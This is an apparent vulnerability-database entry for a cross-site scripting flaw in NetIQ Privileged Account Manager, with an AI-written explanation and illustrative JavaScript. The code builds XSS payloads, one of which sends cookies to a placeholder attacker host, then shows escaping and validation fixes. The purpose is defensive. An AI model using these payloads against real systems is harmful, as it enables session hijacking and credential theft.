Cross-site scripting attacks against NetIQ Privileged Account Manager
Description
NetIQ Privileged Account Manager before 3.1 Patch Update 3 allowed cross-site scripting attacks via the "type" and "account" parameters of JSON requests.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
NetIQ Privileged Account Manager before 3.1 Patch Update 3 is vulnerable to cross-site scripting (XSS) via the 'type' and 'account' parameters in JSON requests; the description does not say whether the injected content is reflected or stored.
Vulnerability
NetIQ Privileged Account Manager (NPAM) versions prior to 3.1 Patch Update 3 are vulnerable to cross-site scripting (XSS) due to insufficient sanitization of the type and account parameters in JSON requests. An attacker can inject arbitrary JavaScript code via these parameters, which is then executed in the browser of any user viewing the affected page.
Exploitation
An attacker can exploit this vulnerability by crafting a JSON request whose type or account parameter carries an HTML/JavaScript payload. The description and references do not state whether the affected endpoint requires authentication, nor whether the payload is reflected in the immediate response or stored and rendered later; in the reflected case the attacker must deliver the crafted request to a victim, typically through social engineering or a malicious link, while in the stored case any user who later views the affected page is exposed. In either case the script runs when the victim's browser renders the page into which the unsanitized parameter value has been inserted.
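The following is an added illustration of the mechanism described in the Vulnerability and Exploitation sections above; it is not NetIQ code and not taken from the references. Only the parameter names type and account come from the CVE description. The request shape, the assumption that the fields are interpolated into an HTML table row, the allow-list of account types and the attacker URL are all invented for the example. It shows a crafted request body, the vulnerable rendering that lets markup in those fields reach the page as markup, and a hardened rendering that HTML-escapes each untrusted field before interpolation.

```javascript
// Added example: unescaped JSON fields reaching HTML, and the hardened form.
// Everything except the parameter names "type" and "account" is assumed.

// Constructed JSON request body with a payload in both parameters.
// The attacker.example host is a placeholder, not a real endpoint.
const craftedRequest = JSON.stringify({
  type: '<img src=x onerror="alert(document.cookie)">',
  account: 'root"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
});

// Parse the request and coerce both fields to strings. Parsing is not the bug;
// the bug is what happens to these strings afterwards.
function parseRequest(body) {
  const obj = JSON.parse(body);
  return { type: String(obj.type ?? ''), account: String(obj.account ?? '') };
}

// VULNERABLE: the fields are concatenated straight into an HTML fragment. When this
// fragment is assigned to innerHTML (or emitted by a server-side template without
// escaping), any tags in type/account are parsed as markup and scripts execute.
function renderVulnerable(req) {
  return `<tr><td>${req.type}</td><td>${req.account}</td></tr>`;
}

// Escape the five characters that change meaning in HTML text and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED: same output shape, but every untrusted field is escaped first, so the
// payload is displayed as literal text instead of being parsed as markup.
function renderHardened(req) {
  return `<tr><td>${escapeHtml(req.type)}</td><td>${escapeHtml(req.account)}</td></tr>`;
}

// Defence in depth for a field with a small value space: reject unknown "type" values
// before they are ever rendered. The set below is assumed, not NetIQ's real list.
const KNOWN_TYPES = new Set(['ssh', 'rdp', 'database']);
function validateType(type) {
  return KNOWN_TYPES.has(type);
}

// Pull the cell contents back out of a rendered row so a regression test can assert
// that no unescaped '<' survives in the hardened output.
function cellsOf(html) {
  return [...html.matchAll(/<td>(.*?)<\/td>/gs)].map((m) => m[1]);
}

// Stand-alone demonstration.
const parsed = parseRequest(craftedRequest);
console.log('vulnerable:', renderVulnerable(parsed));
console.log('hardened:  ', renderHardened(parsed));
console.log('type allowed:', validateType(parsed.type));
```

The hardened version is only correct for the HTML text and double-quoted attribute contexts; a value that lands inside a JavaScript string, a URL, or an unquoted attribute needs context-specific encoding instead, and a framework's built-in templating or a DOM API such as textContent avoids the hand-rolled escaper altogether.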
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the NPAM web application. This can lead to session hijacking, credential theft, defacement, or unauthorized actions performed on behalf of the victim user, potentially compromising the security of the privileged account management system.
Mitigation
The vulnerability is fixed in NetIQ Privileged Account Manager version 3.1 Patch Update 3, released on an unspecified date [1]. Users should upgrade to this version or later. No workarounds are documented in the available references.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <3.1 Patch Update 3
- Range: unspecified
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
[1] bugzilla.suse.com/show_bug.cgi (mitre, x_refsource_CONFIRM)
[2] www.netiq.com/documentation/privileged-account-manager-3/npam3103-release-notes/data/npam3103-release-notes.html (mitre, x_refsource_CONFIRM)
News mentions
No linked articles in our index yet.